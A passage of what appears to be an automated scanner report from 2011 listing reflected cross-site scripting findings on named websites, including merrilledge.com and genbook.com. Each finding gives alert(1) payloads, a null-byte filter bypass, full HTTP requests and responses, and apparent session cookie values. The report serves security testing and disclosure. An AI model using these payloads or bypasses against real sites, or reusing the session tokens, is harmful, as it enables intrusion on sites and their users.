Content-Length: 3186
Connection: close
Content-Type: text/html

function t202Init(){
   //this grabs the t202kw, but if they set a forced kw, this will be replaced
   
   if (readCookie('t202forcedkw')) {
       var t202kw = readCookie('t202forcedkw');
   } else {
       var t202kw = t202GetVar('t202kw');
   }

   var lpip = '923178d39c';alert(1)//86fb6401f85';
   var t202id = t202GetVar('t202id');
   var OVRAW = t202GetVar('OVRAW');
   var OVKEY = t202GetVar('OVKEY');
   var OVMTC = t202GetVar('OVMTC');
   var c1 = t202GetVar('c1');
   var c2 = t202GetVar('c2');
   var
...[SNIP]...

4.47. http://www.directbrand.com/tracking202/static/landing.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.directbrand.com
Path:   /tracking202/static/landing.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89acf'%3balert(1)//3bd7e7a69f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89acf';alert(1)//3bd7e7a69f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tracking202/static/landing.php?lpip=9/89acf'%3balert(1)//3bd7e7a69f2317 HTTP/1.1
Host: www.directbrand.com
Proxy-Connection: keep-alive
Referer: http://www.cleanallspyware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:52:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 3186
Connection: close
Content-Type: text/html

function t202Init(){
   //this grabs the t202kw, but if they set a forced kw, this will be replaced
   
   if (readCookie('t202forcedkw')) {
       var t202kw = readCookie('t202forcedkw');
   } else {
       var t202kw = t202GetVar('t202kw');
   }

   var lpip = '9/89acf';alert(1)//3bd7e7a69f2317';
   var t202id = t202GetVar('t202id');
   var OVRAW = t202GetVar('OVRAW');
   var OVKEY = t202GetVar('OVKEY');
   var OVMTC = t202GetVar('OVMTC');
   var c1 = t202GetVar('c1');
   var c2 = t202GetVar('c2');

...[SNIP]...

4.48. http://www.genbook.com/bookings/booknowjstag.action [bookingSourceId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.genbook.com
Path:   /bookings/booknowjstag.action

Issue detail

The value of the bookingSourceId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9769d'%3balert(1)//7010dea1bfa was submitted in the bookingSourceId parameter. This input was echoed as 9769d';alert(1)//7010dea1bfa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookings/booknowjstag.action?id=30134654&bookingSourceId=10009769d'%3balert(1)//7010dea1bfa HTTP/1.1
Host: www.genbook.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:44:31 GMT
Server: Jetty(6.1.21)
Content-Type: text/javascript; charset=UTF-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=5eplc07ccf1y.cb1;Path=/bookings
X-UA-Compatible: IE=7
Content-Length: 904


var goTimer;
function urchinCheck() {
clearTimeout(goTimer);
try
{
urchinTracker("/booknowtag/30134654");
} catch (e) {
goTimer = window.setTimeout(urchinCheck
...[SNIP]...
<a href="http://www.genbook.com/bookings/slot/reservation/30134654?bookingSourceId=10009769d';alert(1)//7010dea1bfa" target="_blank">
...[SNIP]...

4.49. http://www.merrilledge.com/M/WebResource.axd [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.merrilledge.com
Path:   /M/WebResource.axd

Issue detail

The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0011ed5'-alert(1)-'ced209a762a was submitted in the d parameter. This input was echoed as 11ed5'-alert(1)-'ced209a762a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /M/WebResource.axd?d=whzhnKw2EsLp_zO8-lOxmA2%0011ed5'-alert(1)-'ced209a762a&t=634335774686696206 HTTP/1.1
Host: www.merrilledge.com
Proxy-Connection: keep-alive
Referer: http://www.merrilledge.com/m/pages/global-oao.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=0W34VN9dA9bWGxNH7Zo+wNB4BqhgfwgC/V3SS6QoRVIhpR3iFFqiPEtEy5Vg60B4eA74F0BCLpV6OvE72yrh6+55CW/ai7RnuZGDEpHwvqDe8sRPkCBbEb0l/YGIxk6PrZhVLIoYebn0XY3xMclg+G08+dUO8bhtR0OiIYjoM0++rS7ZOJ/UaaFpw0KtXh6K+2AU8+inyYPyOlBsNy2LbHjpwP50nhqcqqBAIUQ/OhxApBnqmCLnCTSes9vjk4hHDVrhjbXDoPLoISGQqisUzc6TBefD5Q9m4GnifxAiXCyr2xfWKeoDmM//AH+0MV7lybo5N/sihQV4ohsXxYN1J8PCK7RVgHPvhsxGkbmcXf/fRxt0k0zaGW7H8xTY7bFLulvcm1wXA8II0K3qcgsXox5uljKP60/lrQ/iD+Y+VOJAN4phstGAi5uH1rku+/Jz4DeUUSYO3fBMcYMUCguwWF6Tpm5rWb9ogQfkSWUlXd1PKvu/YtQcdoj/0yQueC7l6fbkCSjrjU+TBskdUgQaLWGR6v9BYYwx6I+r6kEdusGSd0Toh8QeOVM8QmpAfl/vpcow5jjnqSi4WCWrtMkZOqeiDWBEhbMZ5EVgOoJJiV0xNFM9qwN4bJ8PgOrbFotT; pxs=53e1d1d2ef5543dabbbb6e0d12a34f8b; pxv=C22A32BD-4241-4EE4-951A-6B07D6D8E16E

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:28:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id
...[SNIP]...
<script type="text/javascript" language="javascript">gObjMLOSEJsLibrary.writeErrorMessage('cdd93d9b-236f-4d83-88ef-18c94a3729cb', '/m/webresource.axd?d=whzhnkw2eslp_zo8-loxma2%0011ed5'-alert(1)-'ced209a762a&t=634335774686696206', "Invalid viewstate.");</script>
...[SNIP]...

4.50. http://www.merrilledge.com/m/pages/global-oao.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.merrilledge.com
Path:   /m/pages/global-oao.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0028c00"><script>alert(1)</script>51f61b3f956 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 28c00"><script>alert(1)</script>51f61b3f956 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /m/pages/global-oao.aspx?%0028c00"><script>alert(1)</script>51f61b3f956=1 HTTP/1.1
Host: www.merrilledge.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=0W34VN9dA9bWGxNH7Zo+wNB4BqhgfwgC/V3SS6QoRVIhpR3iFFqiPEtEy5Vg60B4eA74F0BCLpV6OvE72yrh6+55CW/ai7RnuZGDEpHwvqDe8sRPkCBbEb0l/YGIxk6PrZhVLIoYebn0XY3xMclg+G08+dUO8bhtR0OiIYjoM0++rS7ZOJ/UaaFpw0KtXh6K+2AU8+inyYPyOlBsNy2LbHjpwP50nhqcqqBAIUQ/OhxApBnqmCLnCTSes9vjk4hHDVrhjbXDoPLoISGQqisUzc6TBefD5Q9m4GnifxAiXCyr2xfWKeoDmM//AH+0MV7lybo5N/sihQV4ohsXxYN1J8PCK7RVgHPvhsxGkbmcXf/fRxt0k0zaGW7H8xTY7bFLulvcm1wXA8II0K3qcgsXox5uljKP60/lrQ/iD+Y+VOJAN4phstGAi5uH1rku+/Jz4DeUUSYO3fBMcYMUCguwWF6Tpm5rWb9ogQfkSWUlXd1PKvu/YtQcdoj/0yQueC7l6fbkCSjrjU+TBskdUgQaLWGR6v9BYYwx6I+r6kEdusGSd0Toh8QeOVM8QmpAfl/vpcow5jjnqSi4WCWrtMkZOqeiDWBEhbMZ5EVgOoJJiV0xNFM9qwN4bJ8PgOrbFotT; pxs=53e1d1d2ef5543dabbbb6e0d12a34f8b; pxv=C22A32BD-4241-4EE4-951A-6B07D6D8E16E

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:28:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 89583


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<a href="../System/SearchResults.aspx?.28c00"><script>alert(1)</script>51f61b3f956=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')">
...[SNIP]...

4.51. https://www.merrilledge.com/M/WebResource.axd [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /M/WebResource.axd

Issue detail

The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00da6ca'-alert(1)-'2461730ea55 was submitted in the d parameter. This input was echoed as da6ca'-alert(1)-'2461730ea55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /M/WebResource.axd?d=whzhnKw2EsLp_zO8-lOxmA2%00da6ca'-alert(1)-'2461730ea55&t=634335774460333397 HTTP/1.1
Host: www.merrilledge.com
Connection: keep-alive
Referer: https://www.merrilledge.com/m/pages/home.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=0W34VN9dA9bWGxNH7Zo+wNB4BqhgfwgC/V3SS6QoRVIhpR3iFFqiPEtEy5Vg60B4eA74F0BCLpV6OvE72yrh6+55CW/ai7RnuZGDEpHwvqDe8sRPkCBbEb0l/YGIxk6PrZhVLIoYebn0XY3xMclg+G08+dUO8bhtR0OiIYjoM0++rS7ZOJ/UaaFpw0KtXh6K+2AU8+inyYPyOlBsNy2LbHjpwP50nhqcqqBAIUQ/OhxApBnqmCLnCTSes9vjk4hHDVrhjbXDoPLoISGQqisUzc6TBefD5Q9m4GnifxAiXCyr2xfWKeoDmM//AH+0MV7lybo5N/sihQV4ohsXxYN1J8PCK7RVgHPvhsxGkbmcXf/fRxt0k0zaGW7H8xTY7bFLulvcm1wXA8II0K3qcgsXox5uljKP60/lrQ/iD+Y+VOJAN4phstGAi5uH1rku+/Jz4DeUUSYO3fBMcYMUCguwWF6Tpm5rWb9ogQfkSWUlXd1PKvu/YtQcdoj/0yQueC7l6fbkCSjrjU+TBskdUgQaLWGR6v9BYYwx6I+r6kEdusGSd0Toh8QeOVM8QmpAfl/vpcow5jjnqSi4WCWrtMkZOqeiDWBEhbMZ5EVgOoJJiV0xNFM9qwN4bJ8PgOrbFotT; pxs=53e1d1d2ef5543dabbbb6e0d12a34f8b

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:27:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id
...[SNIP]...
<script type="text/javascript" language="javascript">gObjMLOSEJsLibrary.writeErrorMessage('7359dd1a-7ee0-4a0b-9a37-57a4db53bd63', '/m/webresource.axd?d=whzhnkw2eslp_zo8-loxma2%00da6ca'-alert(1)-'2461730ea55&t=634335774460333397', "Invalid character in a Base-64 string.");</script>
...[SNIP]...

4.52. https://www.merrilledge.com/m/pages/home.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/home.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00dfd72"><script>alert(1)</script>3b54af6fcbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dfd72"><script>alert(1)</script>3b54af6fcbc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /m/pages/home.aspx?%00dfd72"><script>alert(1)</script>3b54af6fcbc=1 HTTP/1.1
Host: www.merrilledge.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:27:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=XCz954I56gOso/MmYDefhHeVxIphfVlz/0uAJoQz2Xkw3Y5z8C0b8R89oFyDrMmDrAP9c1tziVA++dK/37pQlfS9Mc6GTiWNtwFJ0stjRrrdJRSTqyY9aToSVgPQmUL1Z8P7SSO331cHy1K42cghmurI/U3JnKpsz+nYB4HLTC0sSyeEnXI4yS7oceCAVQ0ED2qCQnEioZx9UdH6Sr5WkC1s9rlxAZiyd8I1eZtZg9CiWi9zP7dmxD/8X7xDCf8Pi3y47uO9XfcG2SZdBQmsmhtes9e4g5mLcLJAzIe7teenxJ8kf7nHEDTBNbSZ7BW3kvbHM1vn/ccupJwOUUdRBjqXiVpbmih8QYEJG0dYG9mbn/2wzHdyOZdRErHVMLh2eb1cuQ7bu5p8BcuTOit1ewFNrbZVmmi0NrD3B2gIfHdK565eafGY1Um02KM5oqJsCHQlfsnR7rTSG+3dERZYONhi6bOeuXSWwElFIghWRm4kYrs4TdocArZ5ZPBXgzXp02eg9yUD5y2gta0i0T4b0LEsnIy4OhFbyREKUmJeQ1JjddOso75OTIRVQfOQ5vMFBQWwz7NBUMyugrB8jtfL0BfapDTuCO5bgavcUJ3PGxlJB4xzhN/0H06mzk3tuxnb; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=d6abc9104d8440bf81099a8ffa6cf434; domain=.merrilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 107310


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<a href="../System/SearchResults.aspx?.dfd72"><script>alert(1)</script>3b54af6fcbc=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')">
...[SNIP]...

4.53. http://www.secureconnect.com/rssReplayProxy.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.secureconnect.com
Path:   /rssReplayProxy.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c0842%3balert(1)//395063d27b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c0842;alert(1)//395063d27b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rssReplayProxy.php?cache=true&source=sec/c0842%3balert(1)//395063d27b0ure1 HTTP/1.1
Host: www.secureconnect.com
Proxy-Connection: keep-alive
Referer: http://www.secureconnect.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32024892.1303775103.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=32024892.207743889.1303775103.1303775103.1303775103.1; __utmc=32024892; __utmb=32024892.2.10.1303775103

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:51:21 GMT
Server: Apache/2.2.14 (FreeBSD) mod_ssl/2.2.14 OpenSSL/0.9.8k PHP/5.3.3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3
Content-Length: 99
Content-Type: text/html

RSS Replay Proxy Error: No matching source for the specified ID sec/c0842;alert(1)//395063d27b0ure1

4.54. http://www.secureconnect.com/rssReplayProxy.php [source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.secureconnect.com
Path:   /rssReplayProxy.php

Issue detail

The value of the source request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1a571%3balert(1)//bd3ba58ca17 was submitted in the source parameter. This input was echoed as 1a571;alert(1)//bd3ba58ca17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rssReplayProxy.php?cache=true&source=secure11a571%3balert(1)//bd3ba58ca17 HTTP/1.1
Host: www.secureconnect.com
Proxy-Connection: keep-alive
Referer: http://www.secureconnect.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32024892.1303775103.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=32024892.207743889.1303775103.1303775103.1303775103.1; __utmc=32024892; __utmb=32024892.2.10.1303775103

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:48:27 GMT
Server: Apache/2.2.14 (FreeBSD) mod_ssl/2.2.14 OpenSSL/0.9.8k PHP/5.3.3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3
Content-Length: 98
Content-Type: text/html

RSS Replay Proxy Error: No matching source for the specified ID secure11a571;alert(1)//bd3ba58ca17

4.55. http://adserving.cpxinteractive.com/st [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1a49'-alert(1)-'60927c08fe6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /st?ad_type=ad&ad_size=728x90&section=1712152 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=a1a49'-alert(1)-'60927c08fe6
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 13:46:52 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 26 Apr 2011 13:46:52 GMT
Content-Length: 359

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=728x90&inv_code=1712152&referrer=http://www.google.com/search%3Fhl=en%26q=a1a49'-alert(1)-'60927c08fe6&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D728x90%26section%3D1712152">
...[SNIP]...

4.56. http://player.vimeo.com/config/14606948 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://player.vimeo.com
Path:   /config/14606948

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 75f59<a>71ad99134ed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /config/14606948?type=moogaloop_embed&referrer=http%3A%2F%2Fwww.hugthecloud.com%2F&fullscreen=1&color=00ADEF&autoplay=0&server=vimeo.com&show_title=1&loop=0&show_byline=1&player_server=player.vimeo.com&show_portrait=1&cdn_server=a.vimeocdn.com HTTP/1.1
Host: player.vimeo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=75f59<a>71ad99134ed
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=256147786.1303747424.3.3.utmcsr=customermagnetism.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=256147786.658057560.1303432520.1303575918.1303747424.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:41 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
X-Server: 10.90.128.67
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Fri, 25 Feb 1983 09:30:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: application/json
Content-Length: 2460

{"request":{"cached_timestamp":1303823915,"source":"cache","signature":"ecc9f539b2ef60040c00a6358da3153e","timestamp":1303823921,"referrer":"http:\/\/www.google.com\/search?hl=en&q=75f59<a>71ad99134ed","vimeo_url":"vimeo.com","player_url":"player.vimeo.com","cdn_url":"a.vimeocdn.com","cookie_domain":".vimeo.com"},"video":{"id":14606948,"title":"VMworld vCloud Datacenter","width":640,"height":360,"d
...[SNIP]...

4.57. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 22b9a<script>alert(1)</script>2f6897011f9 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732015&AR_C=178113848 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:50 2011&prad=253732017&arc=194941023&; UID=875e3f1e-184.84.247.65-130334904622b9a<script>alert(1)</script>2f6897011f9

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 14:21:18 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:18 2011&prad=253732015&arc=178113848&; expires=Mon 25-Jul-2011 14:21:18 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303827678; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732015",Pid:"p97174789",Arc:"178113848",Location:
...[SNIP]...
